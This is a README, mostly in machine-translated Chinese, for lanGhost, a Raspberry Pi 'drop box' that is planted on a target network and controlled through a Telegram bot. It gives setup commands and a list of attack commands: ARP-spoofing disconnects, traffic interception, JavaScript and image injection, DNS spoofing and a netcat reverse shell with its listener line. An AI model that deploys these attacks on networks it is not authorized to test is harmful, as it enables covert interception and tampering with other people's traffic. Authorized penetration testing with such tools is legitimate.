蘭幽靈
1.0.0
lanGhost 專為Raspberry Pi ( Raspbian / Kali for RPi )而設計。在其他/桌面發行版上運行它可能會導致問題,並且可能無法正常工作。
您將需要一個 SD 卡上帶有新 Raspbian/Kali 的Raspberry Pi ,因為您不希望在背景運行任何其他內容。
啟動 Pi,取得 SSH 銷售或連接顯示器和鍵盤,然後輸入以下命令:
$ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/xdavidhu/lanGhost
$ cd lanGhost
$ sudo ./setup.py
請在運行安裝腳本時閱讀問題/訊息!
[+] Please enter the name of the network interface connected/will
be connected to the target LAN. Default wired interface is 'eth0',
and the default wireless interface is 'wlan0' on most systems, but
you can check it in a different terminal with the 'ifconfig' command.
[+] Please create a Telegram API key by messaging @BotFather on Telegram
with the command '/newbot'.
After this, @BotFather will ask you to choose a name for your bot.
This can be anything you want.
Lastly, @BotFather will ask you for a username for your bot. You have
to choose a unique username here which ends with 'bot'. For
example: xdavidbot. Make note of this username, since later
you will have to search for this to find your bot, which lanGhost
will be running on.
After you send your username of choise to @BotFather, you will recieve
your API key.
[+] Now for lanGhost to only allow access to you, you need to verify yourself.
Send the verification code below TO THE BOT you just created. Just search for your
bot's @username (what you sent to @BotFather) to find it.
[+] Verification code to send: ******
[+] Do you want lanGhost to start on boot? This option is necessary if you are using
this device as a dropbox, because when you are going to drop this device into a
network, you will not have the chanse to start lanGhost remotely! (autostart works
by adding a new cron '@reboot' entry)
不建議在大於 /24 的網路上使用 lanGhost,因為掃描將花費太長時間。
蘭鬼不安靜了。任何監控流量的人都可以看到 ARP 封包!
如果您在step 4/4 (autostart)中選擇了yes則 Pi 已完全設定為可丟棄。 lanGhost 應該在啟動時啟動,並在 Telegram 上向您發送一條訊息,其中包含文字: lanGhost started! ? 。
請務必先在您的實驗室中嘗試一下,並測試 lanGhost 是否回應您的訊息!
如果一切就緒,只需將乙太網路線插入 Pi 並透過 micro USB 連接電源,即可將其連接到目標網絡,然後就可以開始了!
(lanGhost也可以透過WiFi運作,但您需要先設定wpa_supplicant以自動連線到網路)
/scan - Scan LAN network
/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
/ping - Pong.
您可以使用以下命令之一開始攻擊: /kill, /mitm, /replaceimg, /injectjs, /spoofdns
當您執行一個或多個攻擊後,您可以使用/attack指令取得包含ATTACK-ID的攻擊清單。
若要停止攻擊,請/stop [ATTACK-ID] 。
/reversesh只建立一個未加密的 netcat TCP 連接,並且可以監控所有流量!僅將其用於緊急修復或必要時設定加密反向連線。
/reversesh指令用於在無法從外部存取時在 Pi 上取得反向 shell。
要使用/reversesh命令,您需要有一個伺服器來偵聽 shell。
Netcat 指令啟動伺服器上的偵聽器:
$ nc -l 0.0.0.0 [PORT]
電報命令:
/reversesh [IP-of-your-listening-server] [PORT]
/kill - 停止目標的網路連線。/mitm - 捕獲來自目標的 HTTP 和 DNS 流量並以簡訊形式發送。/replaceimg - 將目標的 HTTP 影像替換為您傳送給機器人的圖片。/injectjs - 將 JavaScript 注入到目標的每個 HTTP HTML 回應中。您需要在伺服器上託管 JS 檔案並提供 URL 作為參數。/spoofdns - 欺騙目標的 DNS 回應。所有攻擊都使用ARP欺騙!
/scan - 掃描本地網路並返回線上主機。使用nmap -sn scan 來發現主機。/scanip - 掃描 IP 位址以取得開放連接埠和其他資訊。使用nmap -sS掃描。每次新裝置連接/離開網路時,您都會收到一則訊息。
版權所有 (c) 2018,作者:David Schütz。保留一些權利。
lanGhost 受 MIT 授權條款約束,遵循授權文件中規定的所有指示。您也可以發送電子郵件至 xdavid{at}protonmail{dot}com。
